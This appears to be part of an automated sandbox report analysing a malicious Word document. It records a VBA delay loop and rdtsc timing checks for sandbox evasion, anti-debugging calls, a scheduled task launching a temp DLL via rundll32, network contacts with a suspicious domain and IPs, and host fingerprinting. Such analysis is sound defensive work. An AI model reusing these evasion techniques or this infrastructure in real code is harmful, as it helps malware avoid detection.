Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Source: template[1].doc	Stream path 'VBA/ThisDocument' : For i = 1 To 405306368 j = i Next i
Source: ~DF3EAF6279D3B942E8.TMP.0.dr	Stream path 'VBA/ThisDocument' : For i = 1 To 405306368 j = i Next i For k

Source: C:\Windows\System32\rundll32.exe

RDTSC instruction interceptor: First address: 000007FEF4734FAE second address: 000007FEF4734FBA instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov ecx, eax 0x0000000c rdtsc

Source: C:\Windows\System32\taskeng.exe TID: 1688

Thread sleep time: -60000s >= -30000s

Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_000007FEF4734F60 rdtsc

5_2_000007FEF4734F60

Source: C:\Windows\System32\rundll32.exe

API call chain: ExitProcess graph end node

Anti Debugging

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_000007FEF4747F74 __crtCaptureCurrentContext,IsDebuggerPresent,__crtUnhandledException,

5_2_000007FEF4747F74

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_000007FEF4754FD4 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

5_2_000007FEF4754FD4

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_000007FEF4738BC0 LoadLibraryW,GetProcAddress,FreeLibrary,

5_2_000007FEF4738BC0

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_000007FEF4747B38 GetProcessHeap,

5_2_000007FEF4747B38

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_000007FEF4734F60 rdtsc

5_2_000007FEF4734F60

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_000007FEF47476B4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

5_2_000007FEF47476B4

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\rundll32.exe	Network Connect: 142.250.185.228 443			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Domain query: com.lightbuzear.buzz
Source: C:\Windows\System32\rundll32.exe	Network Connect: 64.52.80.180 443			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Domain query: www.google.com

Source: C:\Windows\System32\taskeng.exe

Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe "C:\Users\user\AppData\Local\Temp\dnrdfsi11023.dll",Rdwmnjioffws

Jump to behavior

Language, Device and Operating System Detection

Source: C:\Windows\System32\rundll32.exe	Code function: _getptd,_getptd,LcidFromHexString,GetLocaleInfoW,TestDefaultLanguage,		5_2_000007FEF4750D20
Source: C:\Windows\System32\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,		5_2_000007FEF4750E6C
Source: C:\Windows\System32\rundll32.exe	Code function: _getptd,GetLocaleInfoW,		5_2_000007FEF4750F1C
Source: C:\Windows\System32\rundll32.exe	Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoEx,_calloc_crt,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,_invoke_watson,		5_2_000007FEF4746ECC
Source: C:\Windows\System32\rundll32.exe	Code function: _getptd,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,TestDefaultCountry,__crtGetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,__crtGetLocaleInfoEx,_invoke_watson,		5_2_000007FEF475000C
Source: C:\Windows\System32\rundll32.exe	Code function: _getptd,_getptd,TranslateName,GetLcidFromLangCountry,GetLcidFromLanguage,TranslateName,GetLcidFromLangCountry,GetLcidFromLanguage,_getptd,EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,__crtDownlevelLCIDToLocaleName,__crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,_itow_s,		5_2_000007FEF4750FC4
Source: C:\Windows\System32\rundll32.exe	Code function: _getptd,EnumSystemLocalesW,		5_2_000007FEF47509A8
Source: C:\Windows\System32\rundll32.exe	Code function: _getptd,EnumSystemLocalesW,		5_2_000007FEF4750A5C
Source: C:\Windows\System32\rundll32.exe	Code function: _getptd,_getptd,LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,TestDefaultLanguage,		5_2_000007FEF4750AF0
Source: C:\Windows\System32\rundll32.exe	Code function: EnumSystemLocalesW,		5_2_000007FEF47514AC
Source: C:\Windows\System32\rundll32.exe	Code function: __crtGetLocaleInfoEx,__crtGetLocaleInfoEx,GetACP,		5_2_000007FEF4750478
Source: C:\Windows\System32\rundll32.exe	Code function: __crtGetLocaleInfoEx,		5_2_000007FEF475052C
Source: C:\Windows\System32\rundll32.exe	Code function: __crtDownlevelLocaleNameToLCID,GetLocaleInfoW,		5_2_000007FEF475156C
Source: C:\Windows\System32\rundll32.exe	Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,__crtGetUserDefaultLocaleName,_invoke_watson,_invoke_watson,_getptd,_getptd,LcidFromHexString,GetLocaleInfoW,		5_2_000007FEF4750630
Source: C:\Windows\System32\rundll32.exe	Code function: _getptd,__lc_wcstolc,__get_qualified_locale_downlevel,__get_qualified_locale,__lc_lctowcs,__crtGetLocaleInfoEx,GetACP,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,		5_2_000007FEF47456F4
Source: C:\Windows\System32\rundll32.exe	Code function: __crtGetLocaleInfoEx,malloc,__crtGetLocaleInfoEx,WideCharToMultiByte,		5_2_000007FEF47520B0
Source: C:\Windows\System32\rundll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,		5_2_000007FEF475221C

Source: C:\Windows\System32\taskeng.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_000007FEF4743D80 GetSystemTimeAsFileTime,

5_2_000007FEF4743D80

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_000007FEF4749218 _lock,_get_daylight,_get_daylight,_get_daylight,___lc_codepage_func,_malloc_crt,_invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,

5_2_000007FEF4749218

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_000007FEF4736150 GetUserNameW,GetComputerNameW,

5_2_000007FEF4736150